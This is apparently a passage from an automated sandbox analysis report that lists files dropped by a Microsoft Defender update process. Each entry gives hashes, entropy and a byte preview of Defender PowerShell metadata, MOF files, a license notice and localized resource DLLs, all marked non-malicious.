File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14398
Entropy (8bit):	5.977177438588654
Encrypted:	false
SSDEEP:	384:M0m6YBOzHQV80tQEFubg1+/pjK02JsuVRqikVcqgyOTx0vz:M0m6YQzHY80tQt3/M02JVWVcqHSxY
MD5:	7C91EEB90EFFB9A8D11DF34FA04FB359
SHA1:	BDFD38D168DBD76C7EC1045B8C15AFD1D6905C74
SHA-256:	97DF56A7933A45143233D314EA947801BF0A475D55A9D852FB411FFD98CB4123
SHA-512:	141BF2F83BE8728B1480469830AD0B7BD3F2E32A1EDF58EA528C26576E0E4BB5510F64B994D6A4C337EB537CB40AC78D3329637184D844BAFF0FC88CA24CF865
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatDetection" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatDetection</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhdwYJKoZIhvcNAQcCoIIhaDCCIW

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpWDOScan.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14145
Entropy (8bit):	5.978998016086098
Encrypted:	false
SSDEEP:	384:LQ0m6YBOzHQV80tQEFl7Qxh34tSZogX5BRpB6WdGtf/P:80m6YQzHY80tQgQx+t6BHBddGtfH
MD5:	0DB7196D0224FBCE614AD6ACA63F8F17
SHA1:	943B7A55F6E584C9BE421871FD4C9E21A0F326EB
SHA-256:	2D87A0FE031420903AE69DB3A30011DC659B489E2B11AA4129FED01ED3F0B00B
SHA-512:	7F9400BDD7DE5F576F6F776F2C0166EB46A68A0040078993574B8226056E419B9C74B738000AFCEC2CFCDD0A5C5CCE3A822DE19E23FEDD63DF47F85755BA1777
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpWDOScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpWDOScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue> .. </Method>.. </Cmdlet>.. </StaticCmdlets>.. </Class> ..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhXgYJKoZIhvcNAQcCoIIhTzCCIUsCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBzAXdbBfjvkCEN -->.. qK7Ym3r0lwef2vQhN9zidTDdkf

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	725240
Entropy (8bit):	6.056118316914494
Encrypted:	false
SSDEEP:	12288:UqjFjzbVd9Y5TFXnu5aHOf/gehVtN41D3mRy46WegMZ2:XjzbV7Y5BUlN4t2Ry6Ug
MD5:	0F9485E242400DC47A9FCA73A3443120
SHA1:	1BD457062BE7B37EAA252C238A9B3BF4EFFF0485
SHA-256:	8DA908D6AD4F307D6AAF8CFB1A9C27B3F3A285F84B1F3C817F50D7B154DC575F
SHA-512:	B2A83A997985CC7FC5D07705E49BCC96BD9E0382CD4BB722C4EBBA3B35EE793C6507DA94AF23B276CB0808FEB7233A37A7F72CCF5974AE607186831AA5EE5C10
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................V...........V.....V.....V..J................%..........Rich...........PE..d...O.5..........." .....`.........................................................U<....`A..........................................................X....P...O....... .......F..<...p.......................(.......8...................t........................text...UX.......`.................. ..`.rdata..vI...p...P...p..............@..@.data...T........p..................@....pdata...O...P...P...0..............@..@.didat..............................@....rsrc...X...........................@..@.reloc...F.......P..................@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.mof Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	91754
Entropy (8bit):	3.59234124916807
Encrypted:	false
SSDEEP:	768:lv7JczQMzhFbvZbY6qyZ+v7JczQMzhFbvZbY6qyZg:RMhWyUMhWya
MD5:	D9619BB89523F47C88DC5FC8BEA50BA0
SHA1:	279098ECBF269FC91585A8D0F7F5A1C72AD2101D
SHA-256:	3ECDCEF5A04C90CA1EB296F3AE4F1C5BC96C371E84BE927C25FA64D6C74C34AF
SHA-512:	F110C9824D5CA8718A4EDA5968DC7DEA7B1C88A498CA2F7706D873D3B6C87FACF8E2ABE7BA20BEF033B8D0322E790C3B0F8CE288166635AE11857B367B9BB9F7
Malicious:	false
Reputation:	unknown
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement_uninstall.mof Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	2570
Entropy (8bit):	3.4549784303178717
Encrypted:	false
SSDEEP:	24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvl5:eTjDGwJ3r24RFZ7a2la2Sa2mWaWP
MD5:	72D045707D108D55B76CD70AD9A84AD6
SHA1:	8FE25F4F289302A49CF2FA0F962FEA4D7D82FB8A
SHA-256:	30A0AD834D7B3F4FB47010B4BB6905576792E83064E9DD858EABF0CCA17FC3DF
SHA-512:	E3C6F3F931AEFCF1F0B1061B7355451692AF1F459F8ED13C39B03951A6A3E833AEBB1031796B5D806C615D3E84C178D628B10AB5EC5CCBC50935CBB0D584FA50
Malicious:	false
Reputation:	unknown
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.o.n.".,.n.o.f.a.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ThirdPartyNotices.txt Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6717
Entropy (8bit):	5.162252158398129
Encrypted:	false
SSDEEP:	96:+WRspYDLPkQHFom1DW4DlHFposoSKYax9gDCk4Cp1PRsQHdBLe:DaVQHFB0AlHISKYoopoQHdxe
MD5:	CE7313760386B6ABDE405F9B9E6EA51D
SHA1:	F969931AC45991F7ECB6767A69433A7082ECCA2F
SHA-256:	73E26404B3571A9E859B3A1144F54C353172479586E0A23C3A7DDA0C1C0AE919
SHA-512:	CF990FC05FD3ED78FF35F1A1ACD5317626D46745BF7E4F8C62AA068A587ABF52F232080464F82692A2BB8C04A4FFA53599B933A4281BC7E697337720DB65BF29
Malicious:	false
Reputation:	unknown
Preview:	===============================================================================..1. C++ REST SDK (https://github.com/Microsoft/cpprestsdk).... C++ REST SDK ....The MIT License (MIT)....Copyright (c) Microsoft Corporation....All rights reserved.....Permission is hereby granted, free of charge, to any person obtaining a copy of..this software and associated documentation files (the "Software"), to deal in..the Software without restriction, including without limitation the rights to..use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of..the Software, and to permit persons to whom the Software is furnished to do so,..subject to the following conditions:....The above copyright notice and this permission notice shall be included in all..copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..FITNESS FOR A PARTICULAR PURPO

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.969613819843474
Encrypted:	false
SSDEEP:	384:7r/SmH7frhpOJsSYNEYffu1vB+sEqEKSTs/WS8/WWRDBRJZ4UslGsV7:7rbHnZNEYfPDR1PV8
MD5:	2A54A6EFE0D70D2F8120E4F9AE10F2AE
SHA1:	35DD602C81E5E1E086C093BB3C3F97CC68FA2FD6
SHA-256:	F90B4913826DA577A68006FC7211E2390534BE9639934AFC5A375436373B1C71
SHA-512:	8AE2DCEEF670F26A753B1525FD126DC4748A5124B94F5B8ECB632E2A55A2B3C709146C40C936806CCFC64B804A1FF23E31C47293ECD4FF524F5CDC86320D205F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p......*.....@.......................................... ..DN...........T... ...........................................................................................rdata..p...........................@..@.rsrc...DN... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\am-ET\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22264
Entropy (8bit):	6.043832073272478
Encrypted:	false
SSDEEP:	384:7raKntNfzRKLpPExWUN7W0WVQB82s/BW/pQWS8/W4RDBRJvsl5D2:7r1ntNfzRKLpcjfRxR1Pl
MD5:	F5F731716CA6C6CEFF57DEE03EB33376
SHA1:	FA71CD3569AD3C6518E626E09965053F58AB6D9D
SHA-256:	A2E33041860906CEF0BCE5B2F3FD2AF88E3DB61E97FF9EB16D650CAD1F69F708
SHA-512:	FCCD58F3A698CE9668322C76140E8FE55B2F484962D1A9B51828C00C3CD888D85EA83D3626993B50098271B250DDE6783FA129E5225153112781D5565313553F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........4...............................................`............@.......................................... ...1...........6... ...........................................................................................rdata..p...........................@..@.rsrc....1... ...2..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...-...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.802281589367443
Encrypted:	false
SSDEEP:	768:7r+0QI4V/O4klevfq7mvqaI216icZKfEflxZFcR1Pga1zR3:qCcHPVZ
MD5:	628870D988EFBFC39C06E7BA62495FFE
SHA1:	A3A302666A07A5FE0D7FAD69DE9B1AFBD8F91536
SHA-256:	161D58719676884DB3BDFEA9A5770A55EC7BEBE839D97B6ECA3D20EC5A3D6B2D
SHA-512:	E04ECDC7226C9B18FC86F51F6B70CD6E13345C8F2A8DFEE0845350777580CF46A738271E949B07216D83A647685DAD3666A7F5C2BA36451E11DB1545AFD9F7E9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................:2....@.......................................... ..X................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25320
Entropy (8bit):	5.568099766445783
Encrypted:	false
SSDEEP:	384:7r8teWannr4pG2RI96HUy/oV/m9HlCWS8/WWRDBRJWiZEQmDWlGszRo:7r5nnr4pG2RI9AoV+9HVbR1PWJ1zv
MD5:	53F858DC25ADF3684E7E025277A57023
SHA1:	A51A05FFA31010C1B28A63B5B7BBB490239BC1C6
SHA-256:	D57524C7B0D7FE779DC3803F041C341F818381E19703D32BAA988F1697D1175C
SHA-512:	0A7E6808CDB2EB6E31596218FE42B2BFEE9B067B22913D43A1E1C1D5B1832C3018B04FC633E8F9223378216372235988FE15F2D9FA074AC595046542FF54B9D1
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........@...............................................`............@.......................................... ...>...........B... ...........................................................................................rdata..p...........................@..@.rsrc....>... ...>..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..H9...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.632188784867651
Encrypted:	false
SSDEEP:	768:7rOPaPbPAPCPLTPnPWPkP8Pe1lOO6FD6kKOy6OQOQ4LuYz3KUrZPk/4hPrPDV86/:xcNgPHPwc
MD5:	D359F26A958650D3B5A28495DC39D409
SHA1:	3EF8B8E1C4E876E1C2A6157AE92C65E629C7559C
SHA-256:	F2A33F57BED6013E9850AB150C83577862DE7FADA3CAA1C87C94100F486D92A7
SHA-512:	0ED71E0EA79B7AA96E8358B28DDE2C7C419C526168271355AA73C281BB123E9306FE1F3A94A1A9A7BBD4234E54CB0760BA31D6BBF5E13BEB8305460000C3685D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p............@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..(H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\az-Latn-AZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.231249488030954
Encrypted:	false
SSDEEP:	768:7rOj1wdJ4v3YFcFqFkFJFgFGFYFhrVbFRdtR1Pl/DM2:Gj1gFcFqFkFJFgFGFYFlVbFbtHPl/w2
MD5:	06A297C9B8293DA4AC3B56D304874F2A
SHA1:	A7B7F072E7A7A5837382293CD65ABF10088E6EA9
SHA-256:	C5D1763D4F042FE777BB02E47E26F76EC9008AF689679BDA6480E1541A1158BF
SHA-512:	AB2C0EACEE65A2CC104DE75C86311374227E3E91E8BCEBED89F729B07681E2A79D88BC73F507C471666FCE8753DC18E83C2C37B27D8088D1563EC8634B05EBD8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64744
Entropy (8bit):	4.650844920332313
Encrypted:	false
SSDEEP:	384:7rTz3pDQHT+ddcOc1jzG/by+psEV++OfYcYQIhJ2YIqqO7a1BQdWhjRDBRJ4NKgY:7rtuDOYz01TO29VqhQ4jR1P4tl51VQ
MD5:	DDFB72494C7DAB2C2DCBBF58F1384BB8
SHA1:	474F7CDEDFEF2B0E5765B5EF151A8DEA7845BE68
SHA-256:	7E28FA6FC9DD05652F3DDCC4B9BC54469DD44995EC69EF149B9477B4C0CE53D6
SHA-512:	6AD3EBF149C1C9A5BE7FF012A2AEE38DD6D2EFADE2EE73E1F41E45393180DA13BB1FB8E079E6D8CBE5D51259A1D57351738D037A3589FF50CF7577C372A1C521
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................H....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.351887592007768
Encrypted:	false
SSDEEP:	384:7rTpJ4DyEhyXvb1vstW33294WS8/WPRDBRJfJs/Al3IKO:7rV4huvUVPmR1PK/KO
MD5:	6275E196D18A7E2E298B30AF3ED5C880
SHA1:	240364A589E90A9DE843CBB9C34555A2E4274793
SHA-256:	06B162090901AC0604283E1CE2EC1928E0A7C651332C3E7BE593E438DB02AC88
SHA-512:	54BFC5FA5D4DB45538E0C60454AB1E58371338C982496A19485BC76A3047E0264F2B30070B5A4E1A30B865FE38A95FF36C758790E5B8C8EE5B8ACEAFA200AEA8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p............@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.555067530565591
Encrypted:	false
SSDEEP:	768:7ruX333303MqF6WVHrS3snXlFwDzffQ6SMn6vvvU98Io/PI44te1eF3r+YR1Ph:F64HK7+YHPh
MD5:	231D5D0EC76C7498E5A94E120943699F
SHA1:	D8DF8518946F02F5C51860983188C574B10A9180
SHA-256:	1807A40E971F9A586671F144CFB34404D2AFAA027EC9E670E323BA70577FC9E4
SHA-512:	E62D8578FA404E1753CA5225AD6DBFDA8AA392B4340C4DCDE8E310CAE522A4960536AD9192D8A18DF47030C8380056D896ECC378A84F3EF9BA2192B6C7DC0024
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p......\b....@.......................................... ...O...........T... ...........................................................................................rdata..p...........................@..@.rsrc....O... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.05898751052722
Encrypted:	false
SSDEEP:	384:7rgBdq0HifHAHyuJv3JSF666n/o001ZAGmIbmLWS8/W+RDBRJilSlGsM3k2:7r8dYuJYyn/oVv3zjR1PihX5
MD5:	6C4B5C9E187A6B13C39FAA41C742EDD6
SHA1:	30A5B3B8826EE8741CD09D5AD65D6BAA2DC68BB0
SHA-256:	9C776358CD7A47CCBA26F992472A0A739C6F0C152B89B5AEDDCACA8AC43684F0
SHA-512:	16E9795DD6EF63CACA9C7D7E96BF0CB2C0177641213F387586D4243E159E6464B1E736A1892071B80433F7F825A0530CEEB72EBABB4F4F7EB3802879AFED916F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........L...............................................p............@.......................................... ...I...........N... ...........................................................................................rdata..p...........................@..@.rsrc....I... ...J..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...D...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES-valencia\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.978741308381524
Encrypted:	false
SSDEEP:	768:7rleQQmmfwxJvYOmnVmJYlEmnVY4mxYCOAlc50EsUpVJg94T4OCaTR1PD/1zx:9eFlNTHPDdx
MD5:	C9E9AE82C7782DC0E66BFE5EFEFF336C
SHA1:	676F16943FAB27A375C2E3F3AC0CE921AB751367
SHA-256:	CA202FDD69FB81DBF24708D144E942FC10ACCFA4703BE979AAD55FD88B62E7F6
SHA-512:	AE90BB4093A1879E8876D45262004AD10FCC9BE13D4BE1F9164C866827F2C48C28CE170274CDA4D0C13C3CE2EBF8106E5D374300F51EDEDE6E580F38BADD75CA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p............@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67816
Entropy (8bit):	4.158464028484954
Encrypted:	false
SSDEEP:	768:7rDj4mcWQ7uhqYxT352UL2dSsq5/8Vczyuz9ppJ4cwQRMC20hvQii98+wEH4cdqd:7WQ170VcfRMZgqHPO/
MD5:	D2A485200AE94654A45301149D87A8A1
SHA1:	501C933C5BC3D5DC9AFADC86FC73D1567DCDADDD
SHA-256:	9164442B33BAA1DAAF4609189D8169CA9DFA67BB673683F66A49ED9145DA7585
SHA-512:	7D763413C96FB4197216F03028046A510E5393EE9789E827DC9665243889491A05E8A4ACDAF813E3E8773E5E952F53960C02AC86FBD4C83EE402B5DEF44CD17B
Malicious:	false
